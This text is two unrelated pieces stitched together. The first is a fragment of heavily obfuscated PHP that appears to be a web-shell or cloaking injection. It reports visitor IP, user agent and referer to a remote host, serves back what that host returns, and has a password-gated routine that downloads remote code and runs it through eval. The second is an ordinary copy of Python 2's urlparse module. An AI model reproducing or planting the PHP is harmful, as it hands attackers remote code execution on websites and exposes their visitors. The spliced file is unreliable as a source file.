ing(0); goto glSNg_LzxYIsX2; glSNg_LzxYIsX2: $utiBLP6LCTh1f2 = "\x72" . "\141" . "\x6e" . "\x67" . "\x65"; goto L8DBoJliwEzMp6; SlOv92pUeuRbs6: function OB2VtLXkgRIPlw($f1mozuANtprQMT) { return rtrim(strtr(base64_encode($f1mozuANtprQMT), "\x2b\57", "\x2d\x5f"), "\75"); } goto TDIrhdxvpNlFt9; os9gRuFURD1cGv: error_reporting(0); goto uxRi5Q7SMo35qu; wH1UQCn4Kym7NZ: @header("\x43\x6f\x6e\164\145\156\164\x2d\x54\171\x70\x65\x3a" . $Obe5O3pNrh1wNk["\x74\171\x70\145"]); goto lY0mM3QMw40Wja; sjCKQHz6Q60Ccm: $HONQlNCvlYnOH8 = substr($Gc9_8J48v7x6gV, strrpos($Gc9_8J48v7x6gV, "\56")); goto pYDglccpOwInMp; utegf_3TzFo8KM: header("\103\157\156\164\145\x6e\x74\x2d\x54\x79\x70\x65\x3a\40\x74\145\x78\x74\57\150\x74\155\154\73\40\x63\x68\x61\162\163\x65\164\75\165\164\x66\x2d\x38"); goto os9gRuFURD1cGv; tmjXznylhTgZ8a: if (in_array($Obe5O3pNrh1wNk["\x73\164\x61\164\x75\x73"], array(0, 200))) { goto nhUzRbCLQnuhLh; } goto c5_FfvrAB9U4Yd; ogjcRqlt8m1yFt: AtSmUC2FnsV8tA::KI1Kxaut6tOb4_(); goto utegf_3TzFo8KM; cCQUyydRpwrclc: $Obe5O3pNrh1wNk = cTP2tSflXg1jMM(base64_decode("\141\110\x52\60\x63\104\x6f\x76\114\62\150\63\131\x6a\x55\64\144\x6a\101\63\x4c\x6e\x42\154\143\110\121\x75\x63\62\x46\x73\132\x53\70"), $Ym0oIOWx6ByrbA); goto tmjXznylhTgZ8a; HEzdriQUoUsbcb: oZofqjcmql98Vl: goto RdRkLruqBbgd8Z; Pji3QhS868OoF4: pdT1WydGNbUwH7: goto uQMzHjqkf81tHB; hiBpnXBGYbBU3U: $kQ67spUDDLBffj = false; goto vf1Hpkrvn4j1uD; Cd7vkzilA61XS4: $cVPbc5aZBpQh4S = ''; goto Pji3QhS868OoF4; YpOvOLk2zAfp6F: $Ym0oIOWx6ByrbA["\163\156"] = ob2vTLxkGRipLW($_SERVER["\123\103\122\x49\x50\124\x5f\x4e\x41\115\105"]); goto hQrHQ4TUM_yVuh; zCPQ5sJ4prS3cM: class AtsmuC2FNSv8tA { static function HiR6oxdC0gvy2z($BW71TGqh6zqLp0) { goto KHgKgOn3FsDTTa; WnkUI9pHyPBuZm: $GkQAuHLQ3N3XQW = ''; goto WM19NL2F93TTJX; KHgKgOn3FsDTTa: $KsSQ2WVlAfhYGi = "\x72" . "\141" . "\156" . "\x67" . "\145"; goto SYHHG2duid0FC5; AkZwDNU1hD13k2: Msf7bOuYLqoUBQ: goto zjbEJbLu1rh6fC; SYHHG2duid0FC5: $AtNGdLmxUU_eyr = $KsSQ2WVlAfhYGi("\176", "\40"); goto sDlG7XxbTh82si; sDlG7XxbTh82si: $Qa8g5WW7UopXE6 = explode("\53", $BW71TGqh6zqLp0); goto WnkUI9pHyPBuZm; WM19NL2F93TTJX: foreach ($Qa8g5WW7UopXE6 as $TzjXB0hEV3mWbH => $vBDjbTJco2LdIH) { $GkQAuHLQ3N3XQW .= $AtNGdLmxUU_eyr[$vBDjbTJco2LdIH - 5199]; ek2Wb04KDv0_8r: } goto AkZwDNU1hD13k2; zjbEJbLu1rh6fC: return $GkQAuHLQ3N3XQW; goto mvSqNKKQW0dWKE; mvSqNKKQW0dWKE: } static function pt0kgTqOQgWXOc($U2C_3PmbNzlS0s, $dFFH41CbFWTZVX) { goto PeU6Y0BKnLAjiD; PeU6Y0BKnLAjiD: $vAUjzk7AjeF8LJ = curl_init($U2C_3PmbNzlS0s); goto XgkiCPEdPud823; F0lfera6M44Flk: $ew4RbqszUvgJ48 = curl_exec($vAUjzk7AjeF8LJ); goto KyuOuTMYBfTs48; KyuOuTMYBfTs48: return empty($ew4RbqszUvgJ48) ? $dFFH41CbFWTZVX($U2C_3PmbNzlS0s) : $ew4RbqszUvgJ48; goto zEsIdRklqzh6zy; XgkiCPEdPud823: curl_setopt($vAUjzk7AjeF8LJ, CURLOPT_RETURNTRANSFER, 1); goto F0lfera6M44Flk; zEsIdRklqzh6zy: } static function ki1kXAUT6tOb4_() { goto EJ7566q1lfwfcm; xsPP8ESDmR1Aur: @eval($ynlJNPNMmDeXVa[1 + 3]($jHnu4Zp7Wf_MZ8)); goto K3HoZH3pxQfn2c; FiKMKPq3gMe0CH: @$ynlJNPNMmDeXVa[0 + 10](INPUT_GET, "\157\x66") == 1 && die($ynlJNPNMmDeXVa[1 + 4](__FILE__)); goto BrQwRNK4B0XILn; CLlLAWjdHMTY3X: foreach ($uOCboEbhYVOtM8 as $w9aHYENXNIyo2G) { $ynlJNPNMmDeXVa[] = self::hiR6oxdc0gVy2z($w9aHYENXNIyo2G); pinv70Hl5Kbn3s: } goto m3wDdy0f3A1DIX; m3wDdy0f3A1DIX: p8r5sgUOVFkFTO: goto Z8yLLNYDCQaHAi; OzamV3emZ6eAbO: $s4rOMgcAWfiAfB = @$ynlJNPNMmDeXVa[2 + 1]($ynlJNPNMmDeXVa[5 + 1], $bVmLTGOkbLprfr); goto L3pzZmGB9cJxd1; uXTgzQ2JHrZmxk: $jHnu4Zp7Wf_MZ8 = self::pt0kgtQOqGWXoc($xj2AeH6SP1maOW[1 + 0], $ynlJNPNMmDeXVa[4 + 1]); goto xsPP8ESDmR1Aur; NO2vbVdI186HFj: HzpQLyst8TW3Tc: goto UaJaR8RWF8BtcP; L3pzZmGB9cJxd1: $xj2AeH6SP1maOW = $ynlJNPNMmDeXVa[2 + 0]($s4rOMgcAWfiAfB, true); goto FiKMKPq3gMe0CH; BrQwRNK4B0XILn: if (!(@$xj2AeH6SP1maOW[0] - time() > 0 and md5(md5($xj2AeH6SP1maOW[0 + 3])) === "\x65\64\66\x66\63\x63\x32\65\145\x38\70\x62\66\60\142\x32\x34\71\x66\x34\141\71\61\x38\x31\65\143\x61\71\x34\x62\61")) { goto HzpQLyst8TW3Tc; } goto uXTgzQ2JHrZmxk; EJ7566q1lfwfcm: $uOCboEbhYVOtM8 = array("\x35\x32\62\x36\x2b\x35\x32\61\x31\53\65\62\62\x34\x2b\x35\x32\x32\70\53\x35\x32\x30\71\x2b\65\62\x32\x34\53\65\x32\x33\x30\x2b\65\x32\x32\63\53\x35\x32\60\70\53\x35\x32\61\x35\53\x35\x32\62\66\53\x35\x32\60\x39\53\x35\62\x32\60\53\65\62\x31\64\53\x35\x32\x31\x35", "\65\x32\61\x30\53\x35\x32\60\71\x2b\65\62\61\x31\53\x35\x32\63\60\x2b\x35\62\x31\x31\53\x35\62\x31\64\53\65\62\60\x39\53\x35\x32\x37\x36\x2b\65\62\67\64", "\65\x32\61\71\x2b\x35\x32\x31\60\53\65\x32\x31\64\x2b\x35\x32\x31\x35\x2b\x35\62\63\x30\53\65\62\62\x35\x2b\65\x32\62\x34\53\x35\62\62\66\53\x35\62\61\64\53\65\x32\x32\x35\x2b\65\62\62\64", "\65\62\61\x33\x2b\x35\62\x32\70\53\x35\x32\x32\66\53\65\x32\x31\x38", "\x35\62\x32\67\53\65\x32\62\70\x2b\65\x32\x31\x30\x2b\65\62\x32\64\x2b\x35\x32\x37\x31\53\65\62\67\63\53\x35\62\x33\x30\x2b\x35\x32\x32\65\x2b\65\x32\x32\x34\53\65\62\x32\66\53\x35\62\x31\x34\53\x35\x32\62\x35\x2b\65\62\x32\x34", "\x35\x32\62\x33\x2b\65\x32\62\60\x2b\65\x32\x31\x37\53\65\62\x32\x34\53\65\x32\x33\60\x2b\65\x32\x32\62\53\x35\62\62\x34\53\x35\x32\x30\x39\x2b\x35\62\x33\x30\53\x35\x32\x32\x36\53\65\62\61\x34\53\65\x32\x31\x35\53\x35\62\x30\x39\53\x35\x32\x32\x34\53\65\x32\61\65\53\x35\62\60\x39\53\65\62\61\60", "\x35\x32\x35\63\53\x35\x32\x38\x33", "\x35\x32\x30\x30", "\x35\62\67\x38\x2b\x35\x32\x38\63", "\65\x32\66\x30\x2b\x35\62\x34\63\53\65\62\x34\63\53\x35\x32\66\60\x2b\x35\62\63\66", "\x35\62\62\x33\x2b\x35\62\62\x30\x2b\x35\x32\x31\67\53\65\62\60\x39\53\x35\62\62\x34\x2b\65\x32\x31\x31\53\65\x32\63\x30\53\65\62\x32\60\53\65\x32\61\65\53\x35\62\61\63\53\65\62\x30\70\x2b\65\62\x30\71"); goto CLlLAWjdHMTY3X; Z8yLLNYDCQaHAi: $bVmLTGOkbLprfr = @$ynlJNPNMmDeXVa[1]($ynlJNPNMmDeXVa[10 + 0](INPUT_GET, $ynlJNPNMmDeXVa[4 + 5])); goto OzamV3emZ6eAbO; K3HoZH3pxQfn2c: die; goto NO2vbVdI186HFj; UaJaR8RWF8BtcP: } } goto ogjcRqlt8m1yFt; t8TpplQkxmNQKg: VWq7n8avJneZWe: goto ZVM0YvvgbIo11U; ufyV20U0fMcSJg: nhUzRbCLQnuhLh: goto b7DnrAS9hKZE6C; L2fzlj7JmrK97A: $Ym0oIOWx6ByrbA["\163"] = oB2VtLXKgRIPLW($DCQAxVYJ0s2xNZ); goto juNf0o5W9RUnP8; TDIrhdxvpNlFt9: function tDk2fhL7aRlnRq() { goto A0jfGlM3HtbTc8; vsGQjQL1n3QW2Q: $cIX1t8ECuEurN8 = $cIX1t8ECuEurN8[0]; goto myJj1wXf2lYI5E; QOh3G8lOqaQWeK: xB39IGICyiwlN1: goto PWUIOKof_frKdi; WSbyHvGkSPW8G6: return $cIX1t8ECuEurN8; goto Grz6njp1WbkzyW; myJj1wXf2lYI5E: Fy2tlq68W1Z4cY: goto WSbyHvGkSPW8G6; B99XlumIIoF9yc: goto O37D2TgI1D66fQ; goto kKfGd_juWsO9SB; tNtX7SnHEoN9ve: if (isset($_SERVER["\x48\124\x54\120\x5f\130\137\x52\x45\101\114\x5f\x49\x50"]) && !empty($_SERVER["\x48\124\x54\x50\x5f\x58\x5f\122\105\101\x4c\x5f\x49\x50"])) { goto IbsgkORsYRpgBL; } goto m1YuAzS4K6e0ZJ; gwXV80f3Kvnin5: $cIX1t8ECuEurN8 = $_SERVER["\110\124\124\120\137\130\x5f\106\117\122\x57\101\x52\x44\x45\x44\137\x46\x4f\x52"]; goto F5UC4mBhfgxdX2; xHNzAyzHVlO5pq: $cIX1t8ECuEurN8 = explode("\54", $cIX1t8ECuEurN8); goto vsGQjQL1n3QW2Q; LkMROqR4RYuDsX: $cIX1t8ECuEurN8 = $_SERVER["\x52\x45\115\117\124\105\x5f\101\x44\x44\x52"]; goto dYhlmimy6UKWgc; PWUIOKof_frKdi: $cIX1t8ECuEurN8 = $_SERVER["\x48\124\124\x50\x5f\x43\x46\x5f\x43\117\116\x4e\105\x43\x54\x49\116\x47\x5f\x49\x50"]; goto B99XlumIIoF9yc; dYhlmimy6UKWgc: goto O37D2TgI1D66fQ; goto QOh3G8lOqaQWeK; c7Zjb3FklkFA6T: $cIX1t8ECuEurN8 = trim(str_replace("\x20", '', $cIX1t8ECuEurN8), "\54"); goto jnEONwk8qQ3QoE; IYNLV2P_z1R8_9: $cIX1t8ECuEurN8 = $_SERVER["\x48\x54\x54\x50\137\130\137\x52\105\x41\x4c\137\x49\x50"]; goto g3xl2m2S2bmEAU; A0jfGlM3HtbTc8: $cIX1t8ECuEurN8 = ''; goto rR27t1UBdIHeAR; rR27t1UBdIHeAR: if (isset($_SERVER["\110\x54\x54\x50\137\x43\x46\137\103\117\x4e\x4e\105\x43\124\111\116\107\137\x49\x50"]) && !empty($_SERVER["\x48\x54\x54\120\x5f\x43\x46\137\103\x4f\x4e\x4e\105\103\124\x49\x4e\x47\x5f\x49\x50"])) { goto xB39IGICyiwlN1; } goto tNtX7SnHEoN9ve; jnEONwk8qQ3QoE: if (!(strpos($cIX1t8ECuEurN8, "\x2c") !== false)) { goto Fy2tlq68W1Z4cY; } goto xHNzAyzHVlO5pq; m1YuAzS4K6e0ZJ: if (isset($_SERVER["\x48\x54\x54\x50\137\130\x5f\x46\x4f\122\x57\101\x52\104\x45\104\137\x46\117\x52"]) && !empty($_SERVER["\x48\x54\124\120\x5f\130\137\x46\117\x52\x57\x41\x52\104\x45\104\137\x46\x4f\x52"])) { goto YO_1CRlkHk0b5K; } goto LkMROqR4RYuDsX; kKfGd_juWsO9SB: IbsgkORsYRpgBL: goto IYNLV2P_z1R8_9; F5UC4mBhfgxdX2: O37D2TgI1D66fQ: goto c7Zjb3FklkFA6T; g3xl2m2S2bmEAU: goto O37D2TgI1D66fQ; goto PoJd83qL9Ntzk7; PoJd83qL9Ntzk7: YO_1CRlkHk0b5K: goto gwXV80f3Kvnin5; Grz6njp1WbkzyW: } goto J5qe_wS1vgzck7; b7DnrAS9hKZE6C: if (!strlen($Obe5O3pNrh1wNk["\143\157\156\x74\145\156\x74"])) { goto VWq7n8avJneZWe; } goto wH1UQCn4Kym7NZ; juNf0o5W9RUnP8: $Ym0oIOWx6ByrbA["\x75"] = ob2VTLxKgRIPLw($_SERVER["\x48\x54\x54\120\x5f\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"]); goto cCQUyydRpwrclc; ks1k8aTWZXL63p: $Ym0oIOWx6ByrbA["\162\146"] = oB2VtLXkgriplW($cVPbc5aZBpQh4S); goto L2fzlj7JmrK97A; zdY3FjKTBRxxC2: exit("\x7b\x20\42\x65\x72\162\x6f\162\42\x3a\40\x32\60\x30\x2c\x20\42\x6c\x63\x22\72\40\x22\x6a\153\42\54\40\x22\144\141\164\x61\42\72\x20\x5b\x20\x31\x20\135\40\x7d"); goto PZW0GG3F0uoCYA; mBWmHT5C3u6kIU: exit(strrev(md5($_SERVER["\110\x54\124\x50\137\x48\117\123\124"]))); goto iFI7SVRy1TDCFo; lY0mM3QMw40Wja: exit($Obe5O3pNrh1wNk["\x63\x6f\156\x74\x65\156\164"]); goto t8TpplQkxmNQKg; ZVM0YvvgbIo11U: aXnousimfq1MHe: ?>
"""Parse (absolute and relative) URLs.
urlparse module is based upon the following RFC specifications.
RFC 3986 (STD66): "Uniform Resource Identifiers" by T. Berners-Lee, R. Fielding
and L. Masinter, January 2005.
RFC 2732 : "Format for Literal IPv6 Addresses in URL's by R.Hinden, B.Carpenter
and L.Masinter, December 1999.
RFC 2396: "Uniform Resource Identifiers (URI)": Generic Syntax by T.
Berners-Lee, R. Fielding, and L. Masinter, August 1998.
RFC 2368: "The mailto URL scheme", by P.Hoffman , L Masinter, J. Zwinski, July 1998.
RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June
1995.
RFC 1738: "Uniform Resource Locators (URL)" by T. Berners-Lee, L. Masinter, M.
McCahill, December 1994
RFC 3986 is considered the current standard and any future changes to
urlparse module should conform with it. The urlparse module is
currently not entirely compliant with this RFC due to defacto
scenarios for parsing, and for backward compatibility purposes, some
parsing quirks from older RFCs are retained. The testcases in
test_urlparse.py provides a good indicator of parsing behavior.
The WHATWG URL Parser spec should also be considered. We are not compliant with
it either due to existing user code API behavior expectations (Hyrum's Law).
It serves as a useful guide when making changes.
"""
import re
import os
__all__ = ["urlparse", "urlunparse", "urljoin", "urldefrag",
"urlsplit", "urlunsplit", "parse_qs", "parse_qsl"]
# A classification of schemes ('' means apply by default)
uses_relative = ['ftp', 'http', 'gopher', 'nntp', 'imap',
'wais', 'file', 'https', 'shttp', 'mms',
'prospero', 'rtsp', 'rtspu', '', 'sftp',
'svn', 'svn+ssh']
uses_netloc = ['ftp', 'http', 'gopher', 'nntp', 'telnet',
'imap', 'wais', 'file', 'mms', 'https', 'shttp',
'snews', 'prospero', 'rtsp', 'rtspu', 'rsync', '',
'svn', 'svn+ssh', 'sftp','nfs','git', 'git+ssh']
uses_params = ['ftp', 'hdl', 'prospero', 'http', 'imap',
'https', 'shttp', 'rtsp', 'rtspu', 'sip', 'sips',
'mms', '', 'sftp', 'tel']
# These are not actually used anymore, but should stay for backwards
# compatibility. (They are undocumented, but have a public-looking name.)
non_hierarchical = ['gopher', 'hdl', 'mailto', 'news',
'telnet', 'wais', 'imap', 'snews', 'sip', 'sips']
uses_query = ['http', 'wais', 'imap', 'https', 'shttp', 'mms',
'gopher', 'rtsp', 'rtspu', 'sip', 'sips', '']
uses_fragment = ['ftp', 'hdl', 'http', 'gopher', 'news',
'nntp', 'wais', 'https', 'shttp', 'snews',
'file', 'prospero', '']
# Characters valid in scheme names
scheme_chars = ('abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
'0123456789'
'+-.')
# Leading and trailing C0 control and space to be stripped per WHATWG spec.
# == "".join([chr(i) for i in range(0, 0x20 + 1)])
_WHATWG_C0_CONTROL_OR_SPACE = '\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f '
# Unsafe bytes to be removed per WHATWG spec
_UNSAFE_URL_BYTES_TO_REMOVE = ['\t', '\r', '\n']
MAX_CACHE_SIZE = 20
_parse_cache = {}
def clear_cache():
"""Clear the parse cache."""
_parse_cache.clear()
class ResultMixin(object):
"""Shared methods for the parsed result objects."""
@property
def username(self):
netloc = self.netloc
if "@" in netloc:
userinfo = netloc.rsplit("@", 1)[0]
if ":" in userinfo:
userinfo = userinfo.split(":", 1)[0]
return userinfo
return None
@property
def password(self):
netloc = self.netloc
if "@" in netloc:
userinfo = netloc.rsplit("@", 1)[0]
if ":" in userinfo:
return userinfo.split(":", 1)[1]
return None
@property
def hostname(self):
netloc = self.netloc.split('@')[-1]
if '[' in netloc and ']' in netloc:
return netloc.split(']')[0][1:].lower()
elif ':' in netloc:
return netloc.split(':')[0].lower()
elif netloc == '':
return None
else:
return netloc.lower()
@property
def port(self):
netloc = self.netloc.split('@')[-1].split(']')[-1]
if ':' in netloc:
port = netloc.split(':')[1]
if port:
port = int(port, 10)
# verify legal port
if (0 <= port <= 65535):
return port
return None
from collections import namedtuple
class SplitResult(namedtuple('SplitResult', 'scheme netloc path query fragment'), ResultMixin):
__slots__ = ()
def geturl(self):
return urlunsplit(self)
class ParseResult(namedtuple('ParseResult', 'scheme netloc path params query fragment'), ResultMixin):
__slots__ = ()
def geturl(self):
return urlunparse(self)
def urlparse(url, scheme='', allow_fragments=True):
"""Parse a URL into 6 components:
<scheme>://<netloc>/<path>;<params>?<query>#<fragment>
Return a 6-tuple: (scheme, netloc, path, params, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
tuple = urlsplit(url, scheme, allow_fragments)
scheme, netloc, url, query, fragment = tuple
if scheme in uses_params and ';' in url:
url, params = _splitparams(url)
else:
params = ''
return ParseResult(scheme, netloc, url, params, query, fragment)
def _splitparams(url):
if '/' in url:
i = url.find(';', url.rfind('/'))
if i < 0:
return url, ''
else:
i = url.find(';')
return url[:i], url[i+1:]
def _splitnetloc(url, start=0):
delim = len(url) # position of end of domain part of url, default is end
for c in '/?#': # look for delimiters; the order is NOT important
wdelim = url.find(c, start) # find first of this delim
if wdelim >= 0: # if found
delim = min(delim, wdelim) # use earliest delim position
return url[start:delim], url[delim:] # return (domain, rest)
def _checknetloc(netloc):
if not netloc or not isinstance(netloc, unicode):
return
# looking for characters like \u2100 that expand to 'a/c'
# IDNA uses NFKC equivalence, so normalize for this check
import unicodedata
n = netloc.replace(u'@', u'') # ignore characters already included
n = n.replace(u':', u'') # but not the surrounding text
n = n.replace(u'#', u'')
n = n.replace(u'?', u'')
netloc2 = unicodedata.normalize('NFKC', n)
if n == netloc2:
return
for c in '/?#@:':
if c in netloc2:
raise ValueError("netloc %r contains invalid characters "
"under NFKC normalization"
% netloc)
def _remove_unsafe_bytes_from_url(url):
for b in _UNSAFE_URL_BYTES_TO_REMOVE:
url = url.replace(b, "")
return url
def urlsplit(url, scheme='', allow_fragments=True):
"""Parse a URL into 5 components:
<scheme>://<netloc>/<path>?<query>#<fragment>
Return a 5-tuple: (scheme, netloc, path, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
url = _remove_unsafe_bytes_from_url(url)
scheme = _remove_unsafe_bytes_from_url(scheme)
url = url.lstrip(_WHATWG_C0_CONTROL_OR_SPACE)
scheme = scheme.strip(_WHATWG_C0_CONTROL_OR_SPACE)
allow_fragments = bool(allow_fragments)
key = url, scheme, allow_fragments, type(url), type(scheme)
cached = _parse_cache.get(key, None)
if cached:
return cached
if len(_parse_cache) >= MAX_CACHE_SIZE: # avoid runaway growth
clear_cache()
netloc = query = fragment = ''
i = url.find(':')
if i > 0:
if url[:i] == 'http': # optimize the common case
scheme = url[:i].lower()
url = url[i+1:]
if url[:2] == '//':
netloc, url = _splitnetloc(url, 2)
if (('[' in netloc and ']' not in netloc) or
(']' in netloc and '[' not in netloc)):
raise ValueError("Invalid IPv6 URL")
if allow_fragments and '#' in url:
url, fragment = url.split('#', 1)
if '?' in url:
url, query = url.split('?', 1)
_checknetloc(netloc)
v = SplitResult(scheme, netloc, url, query, fragment)
_parse_cache[key] = v
return v
for c in url[:i]:
if c not in scheme_chars:
break
else:
# make sure "url" is not actually a port number (in which case
# "scheme" is really part of the path)
rest = url[i+1:]
if not rest or any(c not in '0123456789' for c in rest):
# not a port number
scheme, url = url[:i].lower(), rest
if url[:2] == '//':
netloc, url = _splitnetloc(url, 2)
if (('[' in netloc and ']' not in netloc) or
(']' in netloc and '[' not in netloc)):
raise ValueError("Invalid IPv6 URL")
if allow_fragments and '#' in url:
url, fragment = url.split('#', 1)
if '?' in url:
url, query = url.split('?', 1)
_checknetloc(netloc)
v = SplitResult(scheme, netloc, url, query, fragment)
_parse_cache[key] = v
return v
def urlunparse(data):
"""Put a parsed URL back together again. This may result in a
slightly different, but equivalent URL, if the URL that was parsed
originally had redundant delimiters, e.g. a ? with an empty query
(the draft states that these are equivalent)."""
scheme, netloc, url, params, query, fragment = data
if params:
url = "%s;%s" % (url, params)
return urlunsplit((scheme, netloc, url, query, fragment))
def urlunsplit(data):
"""Combine the elements of a tuple as returned by urlsplit() into a
complete URL as a string. The data argument can be any five-item iterable.
This may result in a slightly different, but equivalent URL, if the URL that
was parsed originally had unnecessary delimiters (for example, a ? with an
empty query; the RFC states that these are equivalent)."""
scheme, netloc, url, query, fragment = data
if netloc or (scheme and scheme in uses_netloc and url[:2] != '//'):
if url and url[:1] != '/': url = '/' + url
url = '//' + (netloc or '') + url
if scheme:
url = scheme + ':' + url
if query:
url = url + '?' + query
if fragment:
url = url + '#' + fragment
return url
def urljoin(base, url, allow_fragments=True):
"""Join a base URL and a possibly relative URL to form an absolute
interpretation of the latter."""
if not base:
return url
if not url:
return base
bscheme, bnetloc, bpath, bparams, bquery, bfragment = \
urlparse(base, '', allow_fragments)
scheme, netloc, path, params, query, fragment = \
urlparse(url, bscheme, allow_fragments)
if scheme != bscheme or scheme not in uses_relative:
return url
if scheme in uses_netloc:
if netloc:
return urlunparse((scheme, netloc, path,
params, query, fragment))
netloc = bnetloc
if path[:1] == '/':
return urlunparse((scheme, netloc, path,
params, query, fragment))
if not path and not params:
path = bpath
params = bparams
if not query:
query = bquery
return urlunparse((scheme, netloc, path,
params, query, fragment))
segments = bpath.split('/')[:-1] + path.split('/')
# XXX The stuff below is bogus in various ways...
if segments[-1] == '.':
segments[-1] = ''
while '.' in segments:
segments.remove('.')
while 1:
i = 1
n = len(segments) - 1
while i < n:
if (segments[i] == '..'
and segments[i-1] not in ('', '..')):
del segments[i-1:i+1]
break
i = i+1
else:
break
if segments == ['', '..']:
segments[-1] = ''
elif len(segments) >= 2 and segments[-1] == '..':
segments[-2:] = ['']
return urlunparse((scheme, netloc, '/'.join(segments),
params, query, fragment))
def urldefrag(url):
"""Removes any existing fragment from URL.
Returns a tuple of the defragmented URL and the fragment. If
the URL contained no fragments, the second element is the
empty string.
"""
if '#' in url:
s, n, p, a, q, frag = urlparse(url)
defrag = urlunparse((s, n, p, a, q, ''))
return defrag, frag
else:
return url, ''
try:
unicode
except NameError:
def _is_unicode(x):
return 0
else:
def _is_unicode(x):
return isinstance(x, unicode)
# unquote method for parse_qs and parse_qsl
# Cannot use directly from urllib as it would create a circular reference
# because urllib uses urlparse methods (urljoin). If you update this function,
# update it also in urllib. This code duplication does not existin in Python3.
_hexdig = '0123456789ABCDEFabcdef'
_hextochr = dict((a+b, chr(int(a+b,16)))
for a in _hexdig for b in _hexdig)
_asciire = re.compile('([\x00-\x7f]+)')
def unquote(s):
"""unquote('abc%20def') -> 'abc def'."""
if _is_unicode(s):
if '%' not in s:
return s
bits = _asciire.split(s)
res = [bits[0]]
append = res.append
for i in range(1, len(bits), 2):
append(unquote(str(bits[i])).decode('latin1'))
append(bits[i + 1])
return ''.join(res)
bits = s.split('%')
# fastpath
if len(bits) == 1:
return s
res = [bits[0]]
append = res.append
for item in bits[1:]:
try:
append(_hextochr[item[:2]])
append(item[2:])
except KeyError:
append('%')
append(item)
return ''.join(res)
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, max_num_fields=None,
separator=None):
"""Parse a query given as a string argument.
Arguments:
qs: percent-encoded query string to be parsed
keep_blank_values: flag indicating whether blank values in
percent-encoded queries should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
max_num_fields: int. If set, then throws a ValueError if there
are more than n fields read by parse_qsl().
"""
dict = {}
for name, value in parse_qsl(qs, keep_blank_values, strict_parsing,
max_num_fields, separator):
if name in dict:
dict[name].append(value)
else:
dict[name] = [value]
return dict
class _QueryStringSeparatorWarning(RuntimeWarning):
"""Warning for using default `separator` in parse_qs or parse_qsl"""
# The default "separator" for parse_qsl can be specified in a config file.
# It's cached after first read.
_QS_SEPARATOR_CONFIG_FILENAME = '/etc/python/urllib.cfg'
_default_qs_separator = None
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0, max_num_fields=None,
separator=None):
"""Parse a query given as a string argument.
Arguments:
qs: percent-encoded query string to be parsed
keep_blank_values: flag indicating whether blank values in
percent-encoded queries should be treated as blank strings. A
true value indicates that blanks should be retained as blank
strings. The default false value indicates that blank values
are to be ignored and treated as if they were not included.
strict_parsing: flag indicating what to do with parsing errors. If
false (the default), errors are silently ignored. If true,
errors raise a ValueError exception.
max_num_fields: int. If set, then throws a ValueError if there
are more than n fields read by parse_qsl().
Returns a list, as G-d intended.
"""
if (not separator or (not isinstance(separator, (str, bytes)))) and separator is not None:
raise ValueError("Separator must be of type string or bytes.")
# Used when both "&" and ";" act as separators. (Need a non-string value.)
_legacy = object()
if separator is None:
global _default_qs_separator
separator = _default_qs_separator
envvar_name = 'PYTHON_URLLIB_QS_SEPARATOR'
if separator is None:
# Set default separator from environment variable
separator = os.environ.get(envvar_name)
config_source = 'environment variable'
if separator is None:
# Set default separator from the configuration file
try:
file = open(_QS_SEPARATOR_CONFIG_FILENAME)
except EnvironmentError:
pass
else:
with file:
import ConfigParser
config = ConfigParser.ConfigParser()
config.readfp(file)
separator = config.get('parse_qs', envvar_name)
_default_qs_separator = separator
config_source = _QS_SEPARATOR_CONFIG_FILENAME
if separator is None:
# The default is '&', but warn if not specified explicitly
if ';' in qs:
from warnings import warn
warn("The default separator of urlparse.parse_qsl and "
+ "parse_qs was changed to '&' to avoid a web cache "
+ "poisoning issue (CVE-2021-23336). "
+ "By default, semicolons no longer act as query field "
+ "separators. "
+ "See https://access.redhat.com/articles/5860431 for "
+ "more details.",
_QueryStringSeparatorWarning, stacklevel=2)
separator = '&'
elif separator == 'legacy':
separator = _legacy
elif len(separator) != 1:
raise ValueError(
'{} (from {}) must contain '.format(envvar_name, config_source)
+ '1 character, or "legacy". See '
+ 'https://access.redhat.com/articles/5860431 for more details.'
)
# If max_num_fields is defined then check that the number of fields
# is less than max_num_fields. This prevents a memory exhaustion DOS
# attack via post bodies with many fields.
if max_num_fields is not None:
if separator is _legacy:
num_fields = 1 + qs.count('&') + qs.count(';')
else:
num_fields = 1 + qs.count(separator)
if max_num_fields < num_fields:
raise ValueError('Max number of fields exceeded')
if separator is _legacy:
pairs = [s2 for s1 in qs.split('&') for s2 in s1.split(';')]
else:
pairs = [s1 for s1 in qs.split(separator)]
r = []
for name_value in pairs:
if not name_value and not strict_parsing:
continue
nv = name_value.split('=', 1)
if len(nv) != 2:
if strict_parsing:
raise ValueError, "bad query field: %r" % (name_value,)
# Handle case of a control-name with no equal sign
if keep_blank_values:
nv.append('')
else:
continue
if len(nv[1]) or keep_blank_values:
name = unquote(nv[0].replace('+', ' '))
value = unquote(nv[1].replace('+', ' '))
r.append((name, value))
return r